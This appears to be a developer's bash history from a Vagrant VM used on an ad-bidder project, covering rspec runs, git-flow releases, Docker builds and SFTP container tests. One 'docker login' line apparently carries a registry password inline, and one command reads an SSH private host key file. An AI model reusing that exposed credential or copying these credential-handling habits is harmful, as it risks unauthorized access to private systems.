spec/matching/ad_placement_spec +bundle exec rspec spec/matching/ad_placement_spec +bundle exec rspec spec/matching/ad_placement_spec.rb +h | grep launch +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +vim spec/matching/ad_placement_spec.rb +grep -n setup_ron_ * +~ +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +docker-compose down +pwd +./scripts/incremental_build \ +grep -rn is_initialized * +grep -rn is_initialized * +./scripts/incremental_build +h | grep launch +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +./scripts/incremental_build +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/campaign_blacklist_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb +claer +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +h | grep cp +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/domain_matching_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +cal +clear +pwd +docker-compose down +clear +./scripts/incremental_build +bundle exec rspec spec/matching/ad_placement_spec.rb +h | grep launch +bundle exec rake docker_native:launch_bidder +pwd +clear +ls -la +ps -f +docker ps +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +ls -la ../ +ps -f +ls -la ../build/ +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/http/ +bundle exec rspec spec/yahoo +docker-compose down +./scripts/incremental_build +h | grep launch +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +h | grep cp +docker-compose down +clear +pwd +ls -la +bundle exec rake docker_native:launch_bidder +ps -f +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/budget_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/matching/ad_placement_spec.rb.bak +clear +h | grep cp +ls -ltr +h | grep cp +bundle exec rspec spec/matching/ad_placement_spec.rb +ls -la +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +docker-compose down +./scripts/incremental_build +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +docker-compose down +pwd +./scripts/incremental_build +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rake docker_native:launch_bidder +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +docker-compose down +ps -f +scripts/incremental_build +clear +scripts/incremental_build +clear +scripts/incremental_build +bundle exec rspec spec/matching/ad_placement_spec.rb +ps -f +docker ps +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +docker ps +docker-compose down +ps -f +./scripts/incremental_build +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rake docker_native:launch_bidder +ps -f +bundle exec rake docker_native:launch_bidder +ps -f +bundle exec rspec spec/matching/ad_placement_spec.rb +cclear +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +docker-compose down +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +ps -f +bundle exec rake docker_native:launch_bidder +h +bundle exec rspec spec/matching/ad_placement_spec.rb +ps -f +clear +./scripts/incremental_build +clear +./scripts/incremental_build +ps -f +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +ps -f +docker ps +ps -f +./scripts/incremental_build +docker ps +docker-compose down +./scripts/incremental_build +docker ps +bundle exec rake docker_native:launch_bidder +ps -f +bundle exec rspec spec/matching/ad_placement_spec.rb +ps -f +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +vim spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +git status +git diff +docker-compose down +git status +git diff +git diff src/bidder/exchange/OpenRTBExchange.cpp +git checkout -- src/bidder/exchange/OpenRTBExchange.cpp +git diff +git status +git add src/bidder/matching/Ad.cpp +git status +git add ad_placement_spec.rb +git commit +git status +git push +git status +git status +git checkout develop +git pull +git checkout master +git pull +git checkout feature/in_app_filter_matching +git merge develop +vim Gemfile.lock +vim CMakeLists.txt +git diff +git status +./scripts/incremental_build +ps -f +./scripts/clean_build +docker ps +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec docker_native:launch_bidder +bundle +vim Gemfile +bundle +git status +git diff +git add CMakeLists.txt Gemfile Gemfile.lock +git commit +git push +git status +rm tests/spec/matching/ad_placement_spec.rb.bak +clear +pwd +ls -la +docker ps +./scripts/incremental_build +bundle exec rake native_docker:launch_bidder +bundle exec rake docker_native:launch_bidder +bundle exec rake rspec spec/ +bundle exec rspec spec/ +git status +cal +docker ps +docker-compose down +cal +clear +pwd +export $(bundle exec ruby scripts/docker_env_native.rb) +bundle exec rspec spec/ +clear +git status +git diff +git status +git add Ad.cpp Campaign.cc Campaign.h +git commit +git push +git status +git merge develop +clear +pwd +vim ad_placement_spec.rb +ls -la +git diff +vim ad_placement_spec.rb +git status +git diff +git add spec/matching/ad_placement_spec.rb +git commit +git push +./scripts/cppcheck_fast +./scripts/incremental_build +clear +./scripts/incremental_build +clear +./scripts/incremental_build +clear +./scripts/incremental_build +clear +./scripts/incremental_build +./scripts/cppcheck_fast +clear +./scripts/cppcheck_fast +./scripts/incremental_build +clear +./scripts/incremental_build +clear +./scripts/incremental_build +git diff +bundle exec rspec spec/ +grep -rin sifi_params * +vim spec/support/exchange_shared.rb +grep -rn "verify sifi" * +vim spec/support/exchange_shared.rb +grep -n "sifi params" spec/support/exchange_shared.rb +grep -rin "sifi params" 8 +grep -rin "sifi params" * +clear +vim spec/matching/ad_placement_spec.rb +grep -rin "sifi params" * +vim spec/mopub/mopub_spec.rb +vim spec/support/exchange_shared.rb +grep -rin "sifi params" * +h +vim spec/support/exchange_shared.rb +grep sifi_params spec/support/exchange_shared.rb +vim spec/matching/ad_placement_spec.rb +grep -rn sifi_params * +vim spec/matching/geo_spec.rb +vim spec/matching/ad_placement_spec.rb +h +grep -n "sifi params" spec/support/exchange_shared.rb +vim spec/matching/ad_placement_spec.rb +grep -rn sifi_params * +vim spec/matching/segment_targeting_spec.rb +grep sifi_params spec/matching/segment_targeting_spec.rb +vim spec/matching/ad_placement_spec.rb +vim spec/support/exchange_shared.rb +grep is_mobil spec/support/exchange_shared.rb +vim spec/support/exchange_shared.rb +irb +vim spec/support/exchange_shared.rb +irb +vim spec/support/exchange_shared.rb +grep -rn filter_sifi_params * +vim smokers/exchange.rb +vim spec/matching/ad_placement_spec.rb +git diff +vim spec/matching/ad_placement_spec.rb +git statis +git status +vim spec/matching/ad_placement_spec.rb +git diff +git satus +git status +git add spec/matching/ad_placement_spec.rb +git commit +git push +git status +clear +./scripts/incremental_build +ls -la +git status +git checkout -- . +git status +./scripts/incremental_build +git status +git checkout develop +git pull +git checkout master +git pull +git checkout develop +git checkout feature/in_app_filter_matching +git merge develop +git status +git pull +./scripts/update_sifi_cmake master +git status +git push +git merge develop +./scripts/clean_build +exit +pwd +pwd +git status +git checkout master5 +git checkout master +git pull +git checkout develop +git pull +git checkout feature/in_app_filter_matching +git status +git diff +git checkout master +git status +git checkout -- . +git status +git pull +git status +git checkout develop +git pull +git checkout feature/in_app_filter_matching +git checkout master +git checkout -- . +git status +git checkout feature/in_app_filter_matching +git diff +mv tests/spec/matching/ad_placement_spec.rb ~ +ls -la ~ +git status +git pull +git checkout develop +git pull +git checkout feature/in_app_filter_matching +git status +git merge develop +git status +h +ls -la tests/spec/matching/ad_placement_spec.rb +git status +git merge develop +clear +./scripts/incremental_build +clear +./scripts/incremental_build +clear +./scripts/incremental_build +git status +git diff +clear +bundle exec rake docker_native:stop_local +sudo service docker status +bundle exec rake docker_native:launch_bidder +export $(bundle exec ruby scripts/docker_env_native.rb) +pwd +clear +bundle exec rspec spec/ +git status +git diff +git status +git status +git add Ad.cpp Ad.hpp Campaign.cc +git commit +clear +pwd +git status +git push +git status +git merge develop +clear +bundle exec rspec spec/ +docker-compose down +clear +./scripts/incremental_build +git status +git diff +h +bundle exec rake docker_native:launch_bidder +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/ +git diff +docker-compose down +pwd +clear +ls -la +./scripts/incremental_build +clear +./scripts/incremental_build +h +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/ +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/ +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/ +docker-compose down +uptime +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/ +bundle exec rspec spec/matching/ +git status +git diff +git status +git add Ad.cpp Ad.hpp +git commit +git push +git status +docker-compose down +sudo apt-get update +sudo apt-get upgrade +ls -la +vim ad_placement_spec.rb +h +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clea +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +grep -rn md5 * +grep -rn md5 spec/* +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +clear +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/ +docker-compose down +git status +./scripts/clean_build +h | grep local +bundle exec rake docker_native:stop_local +h | grep launch +bundle exec rake docker_native:launch_bidder +bundle exec rspec spec/ +bundle exec rspec spec/matching/ad_placement_spec.rb +bundle exec rspec spec/ +git flow feature finish in_app_filter_matching +git status +docker-compose down +git status +git push +git status +ls -ltr +ls -ltr +git status +git pull +git checkout master +git pull +git flow release start 4.9.0 +git flow release finish 4.9.0 +git status +git push +git status +git status +git checkout master +git status +git push --tags +git status +git push +exit +sudo apt-get update +sudo apt-get upgrade +pcd +ls -la +ls -la +docker run -p 22:22 -d atmoz/sftp foo:pass:::upload +docker run -p 2222:2222 -d atmoz/sftp foo:pass:::upload +docker ps +ps -ef | grep sftp +ps -ef | grep ftp +ls -la +ps -ef +docker stop +docker stop all +docker help +docker help stop +docker stop sftp +docker stop atmoz/sftp +docker ps +docker stop nifty_lewin +docker ps +docker help stop +ls -la +more Dockerfile +more docker-compose.yml +id +pwd +pwd +ls -la +docker-compose up +vim up +vim docker-compose.yml +docker-compose up +bg +more docker-compose.yml +sftp pixy@vagrant +docker stop +docker ps +docker-compose stop +docker ps +docker help +sftp foo@vagrant +docker stop +docker ps +vim docker-compose.yml +docker-compose up +bg +more docker-compose.yml +sftp -P 2222 vagrant@ +ls -la /host/users.conf +ls -la /host +ps -f +docker-compose ps +ls -la /hosts +ls -la +ls -la / +sftp -P 2222 vagrant@ +ls -la +more sshd_config +ls -la +more sshd_config +ls -la /etc/ssh/ +ls -la /etc/ssh/ssh_host_rsa_key +more /etc/ssh/ssh_host_rsa_key +sudo more /etc/ssh/ +ls -la +ls -la /etc/ssh +exit +sudo apt-get update +sudo apt-get upgrade +git pull +exit +git pull +git pull +git pull +git status +clear +pwd +ls -la +ftp --help +git help +sudo apt-get install ftp +which ftp +ftp -h +man ftp +ftp +hostname +git checkout master +git pull +git status +git checkout -- . +git checkout master +git checkout -- . +git statis +git status +git checkout master +rm sifi_cmake/Findmatching_generator-3.4.0.cmake +rm tests/spec/matching/ad_placement_spec.rb +rm tests/src/bidder/recency/ +rm -rf tests/src/bidder/recency +git status +git checkout master +git pull +git pull +git pull +clear +ls -la +git pull +git status +rm -rf cmake-build-debug config.cache cppcheck.xml +git status +git pull +git checkout develop +git pull +git status +git pull +git status +rm -rf .idea .project hosts.new +git pull +git pull +./scripts/update_sifi_cmake master +./scripts/clean_build +ls -la +ls -la +rm -rf * +ls -ltr +ls -la +ls -la +rm -rf * +ls -la +sudo apt-get install automake bison flex g++ git libboost-all-dev libevent-dev libssl-dev libtool make pkg-config +ls -la +git status +git pull +git status +git checkout -- . +git status +git pull +ls -la +ls -la +cmake .. +sudo apt-get update +sudo apt-get upgrade +cmake --version +sudo apt-get update cmake +sudo apt-get info cmake +sudo apt-get help +sudo apt-get check +sudo apt-get install cmake +which cmake +cmake -v +cmake --version +ls -la +make +ls -la +ls -la +ls -la ../adstxtcrawler/thrift/thrift-0.11.0.tar +cp ../adstxtcrawler/thrift/thrift-0.11.0.tar . +ls -la +ls -ltr +tar xvf thrift-0.11.0.tar +ls -la +./bootstrap.sh +./configure +make +ls -la /vagrant/getting_started/thrift/thrift-0.11.0/lib/nodejs/npm-debug.log +tail /vagrant/getting_started/thrift/thrift-0.11.0/lib/nodejs/npm-debug.log +make +ls -la +ls -la +ls -la +ls -la +ls -la +ls -la +ls -la +ls -ltr +ls -la +ls -ltr +ls -la +make +sudo apt-get update +sudo apt-get upgrade +sudo apt-get list | grep dock +sudo apt-get +sudo apt-get check +sudo apt-get autoclean +sudo apt-get purge +sudo apt-get check +sudo sh -c "echo deb\ + ubuntu-xenial main > /etc/apt/sources.list.d/docker.list" +sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys \ +sudo apt-get update +sudo apt-get install -y docker-engine +which docker +which docker-compose +docker --help +docker --version +docker version +hostname +docker info +docker ps +exit +service +service docker status +sudo service docker status +sudo service docker help +man service +service -h +journalctl -u docker +hostname +ls -la +docker --version +docker volume create --help +sudo apt-get update +clear +pwd +sudo apt-get upgrade +pwd +git pull +git checkout master +git pull +clear +pwd +ls -la +ls -la +find . -name Config* -print +ls -ltr +more cstoretest.yaml +more redis-testing.conf +ls -la +more testing-config.yaml +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +ftp +ftp localhost +netstat +ps -ef | grep ftp +clear +pwd +git pull +git pull +ls -la +exit +gem list --local | grep mock] +gem list --local | grep mock +git pull +bundle +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +exit +sudo apt-get update +ls -la +git pull +git checkout develop +git pull +git checkout master +git pull +sudo apt-get upgrade +pwd +ls -la +git pull +git status +git diff +git checkout -- . +git pull +git status +git pull +git status +exit +ls -la +git pull +ls -la +git pull +get fetch +git getch +git fetch +git p[ull +git pull +git checkout -- . +git fetch +git pull +ls -la +ls -la +mv bidder/ old_bidder/ +git clone git@github.com:simplifi/bidder.git +which python +exit +clear +pwd +git pull +clear +ls -la +ls -la +grep -in campaign * +grep -in black * +grep -rin campaign * +1 +ls -la +git pull +ls -la +git pull +ls -la +ls -la +grep -in black * +vim matching_data.thrift +ls -la +ls -la +ls -la +ls -la +grep -in black * +ls -la +cat internal_blacklist.sql +grep -n comp * +cat active_campaign_info.sql +cat active_campaign_ids.sql +cat active_campaign_info.sql +grep -n comp * +cat company_deals.sql +ls -la +ls -la +grep -in arch CMakeLists.txt +vim CMakeLists.txt +clear +ssh sjlb17.int.simpli.fi +exit +ls -la /vagrant/ +ls -la /vagrant/bidder/ +git status +git checkout ../master +git checkout master +git pull +git checkout feature/redis_class_counter +git merge develop +git status +git diff +git checkout -- . +ls -la +git checkout -- . +git status +git checkout feature/redis +git checkout feature/redis_class_counter +git pull +ls -la +git pull +git pull +git status +ls -ltr +rm Finds2geometry.cmake Findxuser-4.0.0.cmake +git pull +git status +git checkout -- . +git status +rm sifi_cmake/Finds2geometry-0.0.1.cmake +git status +git checkout feature/redis_class_counter +git status +./scripts/update_sifi_cmake +./scripts/update_sifi_cmake master +git status +git push +git status +git merge develop +git status +ls -lacmake-build-debug +ls -la cmake-build-debug +./scripts/incremental_build +h +h | grep rake +bundle exec rake test:integration:all +bundle install +bundle exec rake test:fetch_data +bundle exec rake test:fetch_data +bundle +bundle exec rake test:integration:install_config +bundle exec rake test:integration:matching +docker login -u simplifi -p simplifisimpli.fi:5000/v2 +docker-compose pull +bundle exec rake test:integration:all +sudo service docker status +bundle exec rake test:fetch_data +bundle exec rake docker_native:launch_bidder +ruby scripts/docker_up_native.rb +bundle exec rspec spec/ +bundle exec rake test:fetch_data +ls -la Rakefile +ls -ltr +git status +git diff +which rake +bundle exec rake docker_native:stop_local +sudo service docker status +bundle exec rake test:fetch_data +bundle exec rake docker_native:launch_bidder +ruby scripts/docker_up_native.rb +export $(bundle exec rake docker_native:print_env) +bundle exec rspec spec/ +bundle exec rake docker_native:launch_bidder +bundle exec rake test:fetch_data +bundle exec rake test:integration:install_config +grep install_ ../Rakefile +ruby scripts/docker_up_native.rb +ruby scripts/docker_up_native.rb +export $(bundle exec ruby scripts/docker_env_native.rb) +bundle exec rspec spec/ +git status +git flow feature finish redis_class_counter +git status +git push +ps -f +fg +docker-compose down +curl +git status +git pull +git checkout master +git pull +git checkout develop +git flow release start 4.20.4 +git flow release finish 4.20.4 +git push +git status +git checkout master +git push --tags +git push +git status +git pull +git pull +ls -la +git pull +git pull +git pull +ls -la +git pull +git pull +ls -la ../ +git pull +git pull +ls -la ../ +git pull +git pull +git pull +git status +git checkout -- . +git pull +git pull +git status +git checkout -- . +git pull +ls -la../ +ls -la ../ +git pull +git checkout -- . +git pull +ls -la supermarket/ +rm -rf supermarket +ls -la +git pull +git pull +clear +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +git pull +ls -la +git pull +sudo apt-get update +sudo apt-get upgrade +git flow feature start olbl +git pull +git checkout develop +git pull +git checkout -- . +git pull +git checkout -- . +git pull +git checkout master +git pull +git flow feature start olbl +./scripts/clean_build +clear +git pull +git checkout master +git pull +git checkout develop +git status +git checkout -- . +git checkout develop +git pull +git checkout feature/olbl +git merge develop +git pull +./scripts/incremental_build +docker login -u simplifi -p simplifisimpli.fi:5000/v2 +docker-compose pull +bundle exec rake test:integration:all +./scripts/incremental_build +make +./scripts/incremental_build +cat build/Makefile +more build/Makefile +make -f +export PATH=/usr/lib/ccache/bin:$PATH +CONFIG_SITE=~/src/bidder/config.site make +alais +alias +pmake +make +dmake +make +pmake +CONFIG_SITE=~/src/bidder/config.site make +git diff +CONFIG_SITE=~/src/bidder/config.site make +bundle exec rake test:integration:all +bundle exec rake test:integration:matching +./scripts/incremental_build +bundle exec rake test:integration:matching +git status +git diff +git pull +git stash +git status +./scripts/incremental_build +bundle exec rake test:integration:matching +git status +git stash apply +./scripts/incremental_build +bundle exec rake test:integration:matching +pwd +ls -la +ls -la +ps -f +vim testing-config.yaml +bundle exec rake test:integration:matching +./scripts/incremental_build +make +./scripts/incremental_build +sudo apt-get update +sudo apt-get upgrade +git status +git diff +ls -la +vim config/testing-config.yaml +git status +vim config/testing-config.yaml +grep -in orglevel *.yaml +vim config/testing-config.yaml +ls -ltr +vim testing-config.yaml +./scripts/incremental_build +ls -ltr config/testing-config.yaml +pwd +ls -ltr +vim testing-config.yaml.erb +git status +./scripts/incremental_build +h | grep ll +bundle exec rake test:integration:all +bundle exec rake test:integration:matching +ls -la +ls -ltr +cp CPA_campaign_blacklist.txt orglevel_blacklist.txt +vim config/testing-config.yaml.erb +bundle exec rake test:integration:matching +ls -la /vagrant/bidder/test_data/orglevel_blacklist.txt +cat /vagrant/bidder/test_data/orglevel_blacklist.txt +./scripts/incremental_build +./scripts/update_sifi_cmake master +git status +git diff +git status +./scripts/incremental_build +git status +git stash +./scripts/update_sifi_cmake master +git status +./scripts/incremental_build +bundle exec rake test:integration:matching +git stash apply +git pull +gem list | grep matching +gem update matching_generator +./scripts/incremental_build +git status +git add config/testing-config.yaml.erb +git add src/bidder/global/GlobalData.cc +git add src/bidder/global/GlobalData.h +git commit +git status +git push +git push --set-upstream origin feature/olbl +./scripts/update_sifi_cmake master +./scripts/incremental_build +make +bundle exec rake test:integration:matching +git status +ls -la ../test +ls -la ../test_data/ +./scripts/incremental_build +make +bundle exec rake test:integration:matching +cat ../config/testing-config.yaml.erb +git status +git diff +vim ../config/testing-config.yaml +bundle exec rake test:integration:matching +make +git status +vim ../config/testing-config.yaml.erb +git status +git add ../config/testing-config.yaml.erb +git commit +git push +git pull +make +bundle exec rake test:integration:matching +ls -la ../test_data/ads_text.data +git status +make +bundle exec rake test:integration:matching +ls -ltr ../test_data/ +ls -ltr ../config/testing-config.ya +bundle exec rake -T +bundle exec rake test:integration:metrics +ls -ltr +cat orglevel_blacklist.txt +cat CPA_campaign_blacklist.txt +cat CTR_campaign_blacklist.txt +ls -ltr +man cp +which cp +cp -p CPA_campaign_blacklist.txt orglevel_blacklist.txt +ls -ltr +ls -la +bundle exec rake test:integration:metrics +make +make -j4 +make +bundle exec rake test:integration:metrics +ls -la /vagrant/bidder/test_data/ads_text.data +make -j 2 +git pull +./scripts/incremental_build +git status +git diff +clear +make +bundle exec rake test:integration:metrics +bundle exec rake test:integration:matching +bundle exec rake test:integration:all +git status +git diff +grep -rn match_domain_list * +make +./scripts/incremental_build +grep -rn companies * +grep -rn check_company_deals * +clear +pwd +ls -la +./scripts/incremental_build +git pull +sudo apt-get update +sudo apt-get upgrade +sudo apt-get -f install +sudo apt-get update +sudo apt-get upgrade +./scripts/incremental_build +git diff +./scripts/incremental_build +clear +./scripts/incremental_build +./scripts/incremental_build +clear +make +pmake +make +git diff +./scripts/incremental_build +./scripts/incremental_build +git pull +./scripts/clean_build +make +./scripts/incremental_build +./scripts/clean_build +git status +git diff +h +bundle exec rake test:integration:all +./scripts/update_sifi_cmake master +git status +git diff +git status +git add config/testing-config.yaml.erb +git status +git add GlobalData.cc GlobalData.h Matching.h +git status +./scripts/update_sifi_cmake +git status +git push +git status +git commit +git status +git push +git pull +./scripts/update_sifi_cmake +git status +git diff +git add src/bidder/global/GlobalData.cc +git status +./scripts/incremental_build +vim ./scripts/incremental_build +./scripts/incremental_build +clear +./scripts/incremental_build +vim ./scripts/incremental_build +./scripts/incremental_build +bundle exec rake test:integration:all +git pull +clear +pwd +ls -la +git pull +git status +git diff +git status +git push +git diff +git pull +git status +git add src/bidder/global/GlobalData.cc +git commit +git push +git pull +git checkout develop +git status +git diff +git add src/bidder/global/GlobalData.h +git commit +git status +git checkout -- scripts/incremental_build +git pull +git checkout develop +git pull +git checkout master +git pull +git checkout feature/olbl +git push +git merge develop +clear +pwd +ls -la +ls -la +ls -la +ls -la +ls -la +vim . +ls -la +ls -la +ls -la +ls -la +ls -ltr +ls -la +ls -la +vim . +ls -la +grep -rn setup_ron_ * +ks 0ka +ls -la +vim matching_mocks.rb +grep -rn DomainMock * +grep -n Sequal * +grep -n Sequel * +ls -la +ls -la domains_mock.rb +vim domains_mock.rb +ls -la campaign_* +vim campaign_context_mock.rb +cp campaign_context_mock.rb organization_blacklists.rb +vim organization_blacklists.rb +vim organization_blacklists.rb organization_blacklists_items.rb +cp organization_blacklists.rb organization_blacklists_items.rb +vim organization_blacklists.rb organization_blacklists_items.rb +vim domains_mock.rb organization_blacklists_items.rb +ls -ltr +which vim +vim -v +ls -la +vim ~/.vimrc +mkdir -p ~/.vim/autoload ~/.vim/bundle && curl -LSso ~/.vim/autoload/pathogen.vim +vim ~/.vimrc +ls -la +h +vim domains_mock.rb organization_blacklists_items.rb +vim +vim ~/.vimrc +vim domains_mock.rb organization_blacklists_items.rb +ls -la +ls -la +ls -la +git clonescrooloose/nerdtree.git ~/.vim/bundle/nerdtree +vim +vim ~/.vimrc +git clone git://github.com/vim-ruby/vim-ruby.git ~/.vim/bundle/vim-ruby +vim /vagrant/bidder/tests/spec/matching_mocks/organization_blacklists.rb +git clone +vim -u NONE -c "helptags vim-fugitive/doc" -c q +vim +git clone git://github.com/tpope/vim-endwise.git +ls -la .vim/bundle/ +which tmux +pwd +ps -f +ls -ltr +ls -la +vim .bashrc +ls -la +vim domains_mock.rb organization_blacklists.rb +ls -ltr +mv organization_blacklists_items.rb organization_blacklist_items.rb +ls -la +vim domains_mock.rb organization_blacklists.rb +ls -la +vim campaign_context_mock.rb +vim domains_mock.rb organization_blacklists.rb +ls -la +vo, matching_mocks.rb +vi matching_mocks.rb +ls -la matching_mocks/organization_blacklists.rb +bundle exec rake test:integration:all +git status +vim organization_blacklists.rb +ls -la +vim .cache/ +vim .vimrc +bim .bashrc +vim .bashrc +pwd +clear +ls -la +clear +sudo apt-get update +pw +sudo apt-get upgrade +ls -ltr +git status +ps -ef | grep vi +ps -ef | grep vim +ls -la +ls -la +ls -la +vim . +ls -la campaign_* +cat campaign_context_mock.rb +cat campaign_campaign_properties_mock.rb +cat campaign_deals_mock.rb +cat campaign_exchanges_mock.rb +cat campaign_goals_mock.rb +ls -ltr +vim organization_blacklists.rb +ls -la +ls -la +vim domain_matching_spec.rb +ls -la +vim . +vim organization_blacklists.rb organization_blacklist_items.rb +clear +git pull +git status +./scripts/incremental_build +ls -la +ls -ltr +cal +git pull +./scripts/incremental_build +git status +git diff +git stash +git pull +git checkout develop +git pull +git checkout master +git pull +git checkout feature/olbl +git merge develop +ls -la +ls -ltr +vim organization_blacklists.rb +ls -la +vim matching_mocks.rb +git pull +./scripts/update_sifi_cmake +git pull +git status +git diff +./scripts/incremental_build +vim scripts/incremental_build +./scripts/incremental_build +vim scripts/incremental_build +./scripts/incremental_build +git pull +git status +git pull +git pull +git status +git diff +git status +git diff +git checkout -- . +git pull +git status +git pull +./scripts/update_sifi_cmake master +git status +git pull +git branch -l +bundle exec rake test:integration:all +./scripts/clean_build +bundle exec rake test:integration:all +./scripts/incremental_build +bundle exec rake test:integration:all +./scripts/incremental_build +bundle exec rake test:integration:all +./scripts/incremental_build +bundle exec rake test:integration:all +./scripts/incremental_build +bundle exec rake test:integration:matching +git stash +git pull +git status +git checkout develop +gitpull +git pull +git checkout master +gitpull +git pull +./scripts/update_sifi_cmake +git checkout develop +./scripts/update_sifi_cmake +./scripts/update_sifi_cmake master +git checkout -- . +git pull +git checkout feature/olbl +git pull +./scripts/update_sifi_cmake master +git push +git pull +git pull +git checkout develop +git pull +git status +./scripts/clean_build +git pull +make +ls -la +dmake +dmake +ls -la +git status +rm -rf build/ +./scripts/clean_build +ls -la +ls -la Findboost-1.* +rm Findboost-1.* +./scripts/clean_build +rm -rf sifi_cmake +git status +git pull +git checkout -- . +git status +./scripts/clean_build +git status +git checkout develop +git status +git checkout -- . +git status +ls -la +ls -ld bidder* +mv bidder bidder_olbl +git clone git@github.com:simplifi/bidder.git +ls -ltr +git pull +git checkout develop +git status +./scripts/clean_build +git checkout feature/olbl +git merge develop +git status +git push 